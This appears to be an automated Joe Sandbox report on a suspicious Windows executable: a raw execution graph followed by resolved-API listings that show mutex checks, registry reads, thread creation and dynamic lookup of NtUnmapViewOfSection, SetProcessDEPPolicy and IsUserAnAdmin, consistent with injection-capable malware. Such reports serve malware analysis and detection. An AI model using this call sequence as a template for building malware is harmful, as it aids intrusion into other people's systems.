                        execution_graph 45801 404e06 WaitForSingleObject 45802 404e20 SetEvent CloseHandle 45801->45802 45803 404e37 closesocket 45801->45803 45804 404eb8 45802->45804 45805 404e44 45803->45805 45806 404e5a 45805->45806 45814 4050c4 83 API calls 45805->45814 45807 404e6c WaitForSingleObject 45806->45807 45808 404eae SetEvent CloseHandle 45806->45808 45815 41c4c6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 45807->45815 45808->45804 45811 404e7b SetEvent WaitForSingleObject 45816 41c4c6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 45811->45816 45813 404e93 SetEvent CloseHandle CloseHandle 45813->45808 45814->45806 45815->45811 45816->45813 45817 4457a9 GetLastError 45818 4457c2 45817->45818 45819 4457c8 45817->45819 45843 445ceb 11 API calls 2 library calls 45818->45843 45823 44581f SetLastError 45819->45823 45836 443005 45819->45836 45825 445828 45823->45825 45824 4457e2 45844 443c92 20 API calls __dosmaperr 45824->45844 45827 4457f7 45827->45824 45829 4457fe 45827->45829 45846 445597 20 API calls _abort 45829->45846 45830 4457e8 45832 445816 SetLastError 45830->45832 45832->45825 45833 445809 45847 443c92 20 API calls __dosmaperr 45833->45847 45835 44580f 45835->45823 45835->45832 45841 443012 ___crtLCMapStringA 45836->45841 45837 443052 45849 43ad91 20 API calls _abort 45837->45849 45838 44303d RtlAllocateHeap 45839 443050 45838->45839 45838->45841 45839->45824 45845 445d41 11 API calls 2 library calls 45839->45845 45841->45837 45841->45838 45848 440480 7 API calls 2 library calls 45841->45848 45843->45819 45844->45830 45845->45827 45846->45833 45847->45835 45848->45841 45849->45839 45850 40163e 45851 401646 45850->45851 45852 401649 45850->45852 45853 401688 45852->45853 45856 401676 45852->45856 45858 43229f 45853->45858 45855 40167c 45857 43229f new 22 API calls 45856->45857 45857->45855 45862 4322a4 45858->45862 45860 4322d0 45860->45855 45862->45860 45865 439adb 45862->45865 45872 440480 7 API calls 2 library calls 45862->45872 45873 4329bd RaiseException Concurrency::cancel_current_task __CxxThrowException@8 45862->45873 45874 43301b RaiseException Concurrency::cancel_current_task __CxxThrowException@8 45862->45874 45870 443649 ___crtLCMapStringA 45865->45870 45866 443687 45876 43ad91 20 API calls _abort 45866->45876 45867 443672 RtlAllocateHeap 45869 443685 45867->45869 45867->45870 45869->45862 45870->45866 45870->45867 45875 440480 7 API calls 2 library calls 45870->45875 45872->45862 45875->45870 45876->45869 45877 43263c 45878 432648 ___scrt_is_nonwritable_in_current_image 45877->45878 45903 43234b 45878->45903 45880 43264f 45882 432678 45880->45882 46167 4327ae IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 45880->46167 45889 4326b7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 45882->45889 46168 441763 5 API calls TranslatorGuardHandler 45882->46168 45884 432691 45886 432697 ___scrt_is_nonwritable_in_current_image 45884->45886 46169 441707 5 API calls TranslatorGuardHandler 45884->46169 45887 432717 45914 4328c9 45887->45914 45889->45887 46170 4408e7 35 API calls 3 library calls 45889->46170 45898 432743 45900 43274c 45898->45900 46171 4408c2 28 API calls _abort 45898->46171 46172 4324c2 13 API calls 2 library calls 45900->46172 45904 432354 45903->45904 46173 4329da IsProcessorFeaturePresent 45904->46173 45906 432360 46174 436cd1 10 API calls 4 library calls 45906->46174 45908 432365 45913 432369 45908->45913 46175 4415bf 45908->46175 45910 432380 45910->45880 45913->45880 46191 434c30 45914->46191 45917 43271d 45918 4416b4 45917->45918 46193 44c239 45918->46193 45920 4416bd 45921 432726 45920->45921 46197 443d25 35 API calls 45920->46197 45923 40d3f0 45921->45923 46199 41a8da LoadLibraryA GetProcAddress 45923->46199 45925 40d40c 46206 40dd83 45925->46206 45927 40d415 46221 4020d6 45927->46221 45930 4020d6 28 API calls 45931 40d433 45930->45931 46227 419d87 45931->46227 45935 40d445 46253 401e6d 45935->46253 45937 40d44e 45938 40d461 45937->45938 45939 40d4b8 45937->45939 46259 40e609 45938->46259 45940 401e45 22 API calls 45939->45940 45942 40d4c6 45940->45942 45946 401e45 22 API calls 45942->45946 45945 40d47f 46274 40f98d 45945->46274 45947 40d4e5 45946->45947 46290 4052fe 45947->46290 45950 40d4f4 46295 408209 45950->46295 45959 40d4a3 45961 401fb8 11 API calls 45959->45961 45963 40d4ac 45961->45963 46162 4407f6 GetModuleHandleW 45963->46162 45964 401fb8 11 API calls 45965 40d520 45964->45965 45966 401e45 22 API calls 45965->45966 45967 40d529 45966->45967 46312 401fa0 45967->46312 45969 40d534 45970 401e45 22 API calls 45969->45970 45971 40d54f 45970->45971 45972 401e45 22 API calls 45971->45972 45973 40d569 45972->45973 45974 40d5cf 45973->45974 46316 40822a 28 API calls 45973->46316 45976 401e45 22 API calls 45974->45976 45981 40d5dc 45976->45981 45977 40d594 45978 401fc2 28 API calls 45977->45978 45979 40d5a0 45978->45979 45982 401fb8 11 API calls 45979->45982 45980 40d650 45986 40d660 CreateMutexA GetLastError 45980->45986 45981->45980 45983 401e45 22 API calls 45981->45983 45984 40d5a9 45982->45984 45985 40d5f5 45983->45985 46317 411f34 RegOpenKeyExA RegQueryValueExA RegCloseKey 45984->46317 45989 40d5fc OpenMutexA 45985->45989 45987 40d987 45986->45987 45988 40d67f 45986->45988 45992 401fb8 11 API calls 45987->45992 46030 40d9ec 45987->46030 45990 40d688 45988->45990 45991 40d68a GetModuleFileNameW 45988->45991 45994 40d622 45989->45994 45995 40d60f WaitForSingleObject CloseHandle 45989->45995 45990->45991 46320 4192ae 33 API calls 45991->46320 46016 40d99a ___scrt_get_show_window_mode 45992->46016 46318 411f34 RegOpenKeyExA RegQueryValueExA RegCloseKey 45994->46318 45995->45994 45997 40d5c5 45997->45974 45999 40dd0f 45997->45999 45998 40d6a0 46000 40d6f5 45998->46000 46002 401e45 22 API calls 45998->46002 46350 41239a 30 API calls 45999->46350 46004 401e45 22 API calls 46000->46004 46010 40d6bf 46002->46010 46012 40d720 46004->46012 46005 40dd22 46351 410eda 65 API calls ___scrt_get_show_window_mode 46005->46351 46007 40d63b 46007->45980 46319 41239a 30 API calls 46007->46319 46008 40dcfa 46038 40dd6a 46008->46038 46352 402073 28 API calls 46008->46352 46010->46000 46017 40d6f7 46010->46017 46024 40d6db 46010->46024 46011 40d731 46015 401e45 22 API calls 46011->46015 46012->46011 46324 40e501 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 46012->46324 46023 40d73a 46015->46023 46332 4120e8 RegOpenKeyExA RegQueryValueExA RegCloseKey 46016->46332 46322 411eea RegOpenKeyExA RegQueryValueExA RegCloseKey 46017->46322 46018 40dd3a 46353 4052dd 28 API calls 46018->46353 46029 401e45 22 API calls 46023->46029 46024->46000 46321 4067a0 36 API calls ___scrt_get_show_window_mode 46024->46321 46026 40d70d 46026->46000 46323 4066a6 58 API calls 46026->46323 46034 40d755 46029->46034 46035 401e45 22 API calls 46030->46035 46040 401e45 22 API calls 46034->46040 46037 40da10 46035->46037 46333 402073 28 API calls 46037->46333 46354 413980 161 API calls _strftime 46038->46354 46043 40d76f 46040->46043 46045 401e45 22 API calls 46043->46045 46044 40da22 46334 41215f 14 API calls 46044->46334 46047 40d789 46045->46047 46051 401e45 22 API calls 46047->46051 46048 40da38 46049 401e45 22 API calls 46048->46049 46050 40da44 46049->46050 46335 439867 39 API calls _strftime 46050->46335 46054 40d7a3 46051->46054 46053 40d810 46053->46016 46060 401e45 22 API calls 46053->46060 46093 40d89f ___scrt_get_show_window_mode 46053->46093 46054->46053 46056 401e45 22 API calls 46054->46056 46055 40da51 46057 40da7e 46055->46057 46336 41aa4f 81 API calls ___scrt_get_show_window_mode 46055->46336 46065 40d7b8 _wcslen 46056->46065 46337 402073 28 API calls 46057->46337 46063 40d831 46060->46063 46061 40da70 CreateThread 46061->46057 46591 41b212 10 API calls 46061->46591 46062 40da8d 46338 402073 28 API calls 46062->46338 46067 401e45 22 API calls 46063->46067 46065->46053 46071 401e45 22 API calls 46065->46071 46066 40da9c 46339 4194da 79 API calls 46066->46339 46069 40d843 46067->46069 46075 401e45 22 API calls 46069->46075 46070 40daa1 46072 401e45 22 API calls 46070->46072 46073 40d7d3 46071->46073 46074 40daad 46072->46074 46077 401e45 22 API calls 46073->46077 46079 401e45 22 API calls 46074->46079 46076 40d855 46075->46076 46081 401e45 22 API calls 46076->46081 46078 40d7e8 46077->46078 46325 40c5ed 31 API calls 46078->46325 46080 40dabf 46079->46080 46084 401e45 22 API calls 46080->46084 46083 40d87e 46081->46083 46089 401e45 22 API calls 46083->46089 46086 40dad5 46084->46086 46085 40d7fb 46326 401ef3 28 API calls 46085->46326 46092 401e45 22 API calls 46086->46092 46088 40d807 46327 401ee9 11 API calls 46088->46327 46091 40d88f 46089->46091 46328 40b871 46 API calls _wcslen 46091->46328 46094 40daf5 46092->46094 46329 412338 31 API calls 46093->46329 46340 439867 39 API calls _strftime 46094->46340 46097 40d942 ctype 46101 401e45 22 API calls 46097->46101 46099 40db02 46100 401e45 22 API calls 46099->46100 46102 40db0d 46100->46102 46103 40d959 46101->46103 46104 401e45 22 API calls 46102->46104 46103->46030 46106 401e45 22 API calls 46103->46106 46105 40db1e 46104->46105 46341 408f1f 166 API calls _wcslen 46105->46341 46107 40d976 46106->46107 46330 419bca 28 API calls 46107->46330 46110 40d982 46331 40de34 88 API calls 46110->46331 46111 40db33 46113 401e45 22 API calls 46111->46113 46115 40db3c 46113->46115 46114 40db83 46116 401e45 22 API calls 46114->46116 46115->46114 46117 43229f new 22 API calls 46115->46117 46122 40db91 46116->46122 46118 40db53 46117->46118 46119 401e45 22 API calls 46118->46119 46120 40db65 46119->46120 46125 40db6c CreateThread 46120->46125 46121 40dbd9 46124 401e45 22 API calls 46121->46124 46122->46121 46123 43229f new 22 API calls 46122->46123 46126 40dba5 46123->46126 46130 40dbe2 46124->46130 46125->46114 46589 417f6a 101 API calls 2 library calls 46125->46589 46127 401e45 22 API calls 46126->46127 46128 40dbb6 46127->46128 46133 40dbbd CreateThread 46128->46133 46129 40dc4c 46131 401e45 22 API calls 46129->46131 46130->46129 46132 401e45 22 API calls 46130->46132 46135 40dc55 46131->46135 46134 40dbfc 46132->46134 46133->46121 46586 417f6a 101 API calls 2 library calls 46133->46586 46137 401e45 22 API calls 46134->46137 46136 40dc99 46135->46136 46139 401e45 22 API calls 46135->46139 46347 4195f8 79 API calls 46136->46347 46140 40dc11 46137->46140 46142 40dc69 46139->46142 46342 40c5a1 31 API calls 46140->46342 46141 40dca2 46348 401ef3 28 API calls 46141->46348 46147 401e45 22 API calls 46142->46147 46144 40dcad 46349 401ee9 11 API calls 46144->46349 46150 40dc7e 46147->46150 46148 40dc24 46343 401ef3 28 API calls 46148->46343 46149 40dcb6 CreateThread 46154 40dce5 46149->46154 46155 40dcd9 CreateThread 46149->46155 46587 40e18d 122 API calls 46149->46587 46345 439867 39 API calls _strftime 46150->46345 46153 40dc30 46344 401ee9 11 API calls 46153->46344 46154->46008 46157 40dcee CreateThread 46154->46157 46155->46154 46588 410b5c 137 API calls 46155->46588 46157->46008 46590 411140 38 API calls ___scrt_get_show_window_mode 46157->46590 46159 40dc39 CreateThread 46159->46129 46592 401bc9 49 API calls _strftime 46159->46592 46160 40dc8b 46346 40b0a3 7 API calls 46160->46346 46163 432739 46162->46163 46163->45898 46164 44091f 46163->46164 46594 44069c 46164->46594 46167->45880 46168->45884 46169->45889 46170->45887 46171->45900 46172->45886 46173->45906 46174->45908 46179 44cd48 46175->46179 46178 436cfa 8 API calls 3 library calls 46178->45913 46182 44cd61 46179->46182 46181 432372 46181->45910 46181->46178 46183 432d4b 46182->46183 46184 432d56 IsProcessorFeaturePresent 46183->46184 46185 432d54 46183->46185 46187 432d98 46184->46187 46185->46181 46190 432d5c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46187->46190 46189 432e7b 46189->46181 46190->46189 46192 4328dc GetStartupInfoW 46191->46192 46192->45917 46194 44c24b 46193->46194 46195 44c242 46193->46195 46194->45920 46198 44c138 48 API calls 5 library calls 46195->46198 46197->45920 46198->46194 46200 41a919 LoadLibraryA GetProcAddress 46199->46200 46201 41a909 GetModuleHandleA GetProcAddress 46199->46201 46202 41a947 GetModuleHandleA GetProcAddress 46200->46202 46203 41a937 GetModuleHandleA GetProcAddress 46200->46203 46201->46200 46204 41a973 24 API calls 46202->46204 46205 41a95f GetModuleHandleA GetProcAddress 46202->46205 46203->46202 46204->45925 46205->46204 46355 419493 FindResourceA 46206->46355 46209 439adb ___std_exception_copy 21 API calls 46210 40ddad ctype 46209->46210 46358 402097 46210->46358 46213 401fc2 28 API calls 46214 40ddd3 46213->46214 46215 401fb8 11 API calls 46214->46215 46216 40dddc 46215->46216 46217 439adb ___std_exception_copy 21 API calls 46216->46217 46218 40dded ctype 46217->46218 46364 4062ee 46218->46364 46220 40de20 46220->45927 46222 4020ec 46221->46222 46223 4023ae 11 API calls 46222->46223 46224 402106 46223->46224 46225 402549 28 API calls 46224->46225 46226 402114 46225->46226 46226->45930 46416 4020bf 46227->46416 46229 419e0a 46230 401fb8 11 API calls 46229->46230 46231 419e3c 46230->46231 46232 401fb8 11 API calls 46231->46232 46234 419e44 46232->46234 46233 419e0c 46422 404182 28 API calls 46233->46422 46237 401fb8 11 API calls 46234->46237 46239 40d43c 46237->46239 46238 419e18 46240 401fc2 28 API calls 46238->46240 46249 40e563 46239->46249 46242 419e21 46240->46242 46241 401fc2 28 API calls 46248 419d9a 46241->46248 46243 401fb8 11 API calls 46242->46243 46245 419e29 46243->46245 46244 401fb8 11 API calls 46244->46248 46423 41ab9a 28 API calls 46245->46423 46248->46229 46248->46233 46248->46241 46248->46244 46420 404182 28 API calls 46248->46420 46421 41ab9a 28 API calls 46248->46421 46250 40e56f 46249->46250 46252 40e576 46249->46252 46424 402143 11 API calls 46250->46424 46252->45935 46254 402143 46253->46254 46255 40217f 46254->46255 46425 402710 11 API calls 46254->46425 46255->45937 46257 402164 46426 4026f2 11 API calls std::_Deallocate 46257->46426 46260 40e624 46259->46260 46427 40f57c 46260->46427 46266 40e663 46267 40d473 46266->46267 46443 40f663 46266->46443 46269 401e45 46267->46269 46270 401e4d 46269->46270 46271 401e55 46270->46271 46538 402138 22 API calls 46270->46538 46271->45945 46276 40f997 __EH_prolog 46274->46276 46539 40fcfb 46276->46539 46277 40f663 36 API calls 46278 40fb90 46277->46278 46543 40fce0 46278->46543 46280 40d491 46282 40e5ba 46280->46282 46281 40fa1a 46281->46277 46549 40f4c6 46282->46549 46285 40d49a 46287 40dd70 46285->46287 46286 40f663 36 API calls 46286->46285 46559 40e5da 70 API calls 46287->46559 46289 40dd7b 46291 4020bf 11 API calls 46290->46291 46292 40530a 46291->46292 46560 403280 46292->46560 46294 405326 46294->45950 46564 4051cf 46295->46564 46297 408217 46568 402035 46297->46568 46300 401fc2 46301 401fd1 46300->46301 46302 402019 46300->46302 46303 4023ae 11 API calls 46301->46303 46309 401fb8 46302->46309 46304 401fda 46303->46304 46305 40201c 46304->46305 46306 401ff5 46304->46306 46307 40265a 11 API calls 46305->46307 46583 403078 28 API calls 46306->46583 46307->46302 46310 4023ae 11 API calls 46309->46310 46311 401fc1 46310->46311 46311->45964 46313 401fb2 46312->46313 46314 401fa9 46312->46314 46313->45969 46584 4025c0 28 API calls 46314->46584 46316->45977 46317->45997 46318->46007 46319->45980 46320->45998 46321->46000 46322->46026 46323->46000 46324->46011 46325->46085 46326->46088 46327->46053 46328->46093 46329->46097 46330->46110 46331->45987 46332->46030 46333->46044 46334->46048 46335->46055 46336->46061 46337->46062 46338->46066 46339->46070 46340->46099 46341->46111 46342->46148 46343->46153 46344->46159 46345->46160 46346->46136 46347->46141 46348->46144 46349->46149 46350->46005 46352->46018 46585 418ccd 104 API calls 46354->46585 46356 4194b0 LoadResource LockResource SizeofResource 46355->46356 46357 40dd9e 46355->46357 46356->46357 46357->46209 46359 40209f 46358->46359 46367 4023ae 46359->46367 46361 4020aa 46371 4024ea 46361->46371 46363 4020b9 46363->46213 46365 402097 28 API calls 46364->46365 46366 406302 46365->46366 46366->46220 46368 402408 46367->46368 46369 4023b8 46367->46369 46368->46361 46369->46368 46378 402787 11 API calls std::_Deallocate 46369->46378 46372 4024fa 46371->46372 46373 402500 46372->46373 46374 402515 46372->46374 46379 402549 46373->46379 46389 4028c8 46374->46389 46377 402513 46377->46363 46378->46368 46400 402868 46379->46400 46381 40255d 46382 402572 46381->46382 46383 402587 46381->46383 46405 402a14 22 API calls 46382->46405 46385 4028c8 28 API calls 46383->46385 46388 402585 46385->46388 46386 40257b 46406 4029ba 22 API calls 46386->46406 46388->46377 46390 4028d1 46389->46390 46391 402933 46390->46391 46392 4028db 46390->46392 46414 402884 22 API calls 46391->46414 46395 4028e4 46392->46395 46397 4028f7 46392->46397 46408 402c8e 46395->46408 46398 4028f5 46397->46398 46399 4023ae 11 API calls 46397->46399 46398->46377 46399->46398 46401 402870 46400->46401 46402 402878 46401->46402 46407 402c83 22 API calls 46401->46407 46402->46381 46405->46386 46406->46388 46409 402c98 __EH_prolog 46408->46409 46415 402e34 22 API calls 46409->46415 46411 4023ae 11 API calls 46413 402d72 46411->46413 46412 402d04 46412->46411 46413->46398 46415->46412 46417 4020c7 46416->46417 46418 4023ae 11 API calls 46417->46418 46419 4020d2 46418->46419 46419->46248 46420->46248 46421->46248 46422->46238 46423->46229 46424->46252 46425->46257 46426->46255 46447 40f821 46427->46447 46430 40f55d 46525 40f7fb 46430->46525 46432 40f565 46530 40f44c 46432->46530 46434 40e651 46435 40f502 46434->46435 46436 40f510 46435->46436 46442 40f53f std::ios_base::_Ios_base_dtor 46435->46442 46535 4335cb 65 API calls 46436->46535 46438 40f51d 46439 40f44c 20 API calls 46438->46439 46438->46442 46440 40f52e 46439->46440 46536 40fbc8 77 API calls 6 library calls 46440->46536 46442->46266 46444 40f66b 46443->46444 46445 40f67e 46443->46445 46537 40f854 36 API calls 46444->46537 46445->46267 46454 40d2ce 46447->46454 46451 40f83c 46452 40e631 46451->46452 46453 40f663 36 API calls 46451->46453 46452->46430 46453->46452 46455 40d2ff 46454->46455 46456 43229f new 22 API calls 46455->46456 46457 40d306 46456->46457 46464 40cb7a 46457->46464 46460 40f887 46461 40f896 46460->46461 46499 40f8b7 46461->46499 46463 40f89c std::ios_base::_Ios_base_dtor 46463->46451 46467 4332ea 46464->46467 46466 40cb84 46466->46460 46468 4332f6 __EH_prolog3 46467->46468 46479 4330a5 46468->46479 46471 433332 46485 4330fd 46471->46485 46474 433314 46493 43347f 37 API calls _Atexit 46474->46493 46476 433370 std::locale::_Init 46476->46466 46477 43331c 46494 433240 21 API calls 2 library calls 46477->46494 46480 4330b4 46479->46480 46482 4330bb 46479->46482 46495 442df9 EnterCriticalSection _abort 46480->46495 46483 4330b9 46482->46483 46496 43393c EnterCriticalSection 46482->46496 46483->46471 46492 43345a 22 API calls 2 library calls 46483->46492 46486 433107 46485->46486 46487 442e02 46485->46487 46488 43311a 46486->46488 46497 43394a LeaveCriticalSection 46486->46497 46498 442de2 LeaveCriticalSection 46487->46498 46488->46476 46491 442e09 46491->46476 46492->46474 46493->46477 46494->46471 46495->46483 46496->46483 46497->46488 46498->46491 46500 4330a5 std::_Lockit::_Lockit 2 API calls 46499->46500 46501 40f8c9 46500->46501 46520 40cae9 4 API calls 2 library calls 46501->46520 46503 40f8dc 46504 40f8ef 46503->46504 46521 40ccd4 77 API calls new 46503->46521 46505 4330fd std::_Lockit::~_Lockit 2 API calls 46504->46505 46506 40f925 46505->46506 46506->46463 46508 40f8ff 46509 40f906 46508->46509 46510 40f92d 46508->46510 46522 4332b6 22 API calls new 46509->46522 46523 436ec6 RaiseException 46510->46523 46513 40f943 46514 40f984 46513->46514 46524 43219b EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait 46513->46524 46514->46463 46520->46503 46521->46508 46522->46504 46523->46513 46526 43229f new 22 API calls 46525->46526 46527 40f80b 46526->46527 46528 40cb7a 41 API calls 46527->46528 46529 40f813 46528->46529 46529->46432 46531 40f469 46530->46531 46532 40f48b 46531->46532 46534 43aa1a 20 API calls 2 library calls 46531->46534 46532->46434 46534->46532 46535->46438 46536->46442 46537->46445 46541 40fd0e 46539->46541 46540 40fd3c 46540->46281 46541->46540 46547 40fe14 36 API calls 46541->46547 46544 40fce8 46543->46544 46546 40fcf3 46544->46546 46548 40fe79 36 API calls __EH_prolog 46544->46548 46546->46280 46547->46540 46548->46546 46550 40f4d0 46549->46550 46551 40f4d4 46549->46551 46554 40f44c 20 API calls 46550->46554 46557 40f30b 67 API calls 46551->46557 46553 40f4d9 46558 43a716 64 API calls 3 library calls 46553->46558 46556 40e5c5 46554->46556 46556->46285 46556->46286 46557->46553 46558->46550 46559->46289 46562 40328a 46560->46562 46561 4032a9 46561->46294 46562->46561 46563 4028c8 28 API calls 46562->46563 46563->46561 46565 4051db 46564->46565 46574 405254 46565->46574 46567 4051e8 46567->46297 46569 402041 46568->46569 46570 4023ae 11 API calls 46569->46570 46571 40205b 46570->46571 46579 40265a 46571->46579 46575 405262 46574->46575 46578 402884 22 API calls 46575->46578 46580 40266b 46579->46580 46581 4023ae 11 API calls 46580->46581 46582 40206d 46581->46582 46582->46300 46583->46302 46584->46313 46593 411253 61 API calls 46588->46593 46595 4406a8 _abort 46594->46595 46596 4406c0 46595->46596 46598 4407f6 _abort GetModuleHandleW 46595->46598 46616 442d9a EnterCriticalSection 46596->46616 46599 4406b4 46598->46599 46599->46596 46628 44083a GetModuleHandleExW 46599->46628 46600 440766 46617 4407a6 46600->46617 46603 4406c8 46603->46600 46605 44073d 46603->46605 46636 441450 20 API calls _abort 46603->46636 46606 440755 46605->46606 46637 441707 5 API calls TranslatorGuardHandler 46605->46637 46638 441707 5 API calls TranslatorGuardHandler 46606->46638 46607 440783 46620 4407b5 46607->46620 46608 4407af 46639 454909 5 API calls TranslatorGuardHandler 46608->46639 46616->46603 46640 442de2 LeaveCriticalSection 46617->46640 46619 44077f 46619->46607 46619->46608 46641 4461f8 46620->46641 46623 4407e3 46625 44083a _abort 8 API calls 46623->46625 46624 4407c3 GetPEB 46624->46623 46626 4407d3 GetCurrentProcess TerminateProcess 46624->46626 46627 4407eb ExitProcess 46625->46627 46626->46623 46629 440864 GetProcAddress 46628->46629 46630 440887 46628->46630 46631 440879 46629->46631 46632 440896 46630->46632 46633 44088d FreeLibrary 46630->46633 46631->46630 46634 432d4b TranslatorGuardHandler 5 API calls 46632->46634 46633->46632 46635 4408a0 46634->46635 46635->46596 46636->46605 46637->46606 46638->46600 46640->46619 46642 44621d 46641->46642 46646 446213 46641->46646 46647 4459f9 46642->46647 46644 432d4b TranslatorGuardHandler 5 API calls 46645 4407bf 46644->46645 46645->46623 46645->46624 46646->46644 46648 445a25 46647->46648 46649 445a29 46647->46649 46648->46649 46653 445a49 46648->46653 46654 445a95 46648->46654 46649->46646 46651 445a55 GetProcAddress 46652 445a65 __crt_fast_encode_pointer 46651->46652 46652->46649 46653->46649 46653->46651 46655 445ab6 LoadLibraryExW 46654->46655 46659 445aab 46654->46659 46656 445ad3 GetLastError 46655->46656 46657 445aeb 46655->46657 46656->46657 46660 445ade LoadLibraryExW 46656->46660 46658 445b02 FreeLibrary 46657->46658 46657->46659 46658->46659 46659->46648 46660->46657

                        Executed Functions

                        Function 0041A8DA Relevance: 105.1, APIs: 36, Strings: 24, Instructions: 130libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                        • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A912
                        • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A927
                        • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A940
                        • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A954
                        • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                        • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A980
                        • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                        • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
                        • GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
                        • GetProcAddress.KERNEL32(00000000), ref: 0041AA22
                        • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
                        • GetProcAddress.KERNEL32(00000000), ref: 0041AA33
                        • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
                        • GetProcAddress.KERNEL32(00000000), ref: 0041AA43
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$HandleModule$LibraryLoad
                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
                        • API String ID: 551388010-2474455403
                        • Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                        • Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
                        • Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                        • Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E
                        Function 004407B5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 473 4407b5-4407c1 call 4461f8 476 4407e3-4407ef call 44083a ExitProcess 473->476 477 4407c3-4407d1 GetPEB 473->477 477->476 479 4407d3-4407dd GetCurrentProcess TerminateProcess 477->479 479->476
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407D6
                        • TerminateProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407DD
                        • ExitProcess.KERNEL32 ref: 004407EF
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$CurrentExitTerminate
                        • String ID:
                        • API String ID: 1703294689-0
                        • Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                        • Instruction ID: 8c86c1f28e0fd2f6406888839527a8aea1509f7e03a0ffdd8510570f14deced8
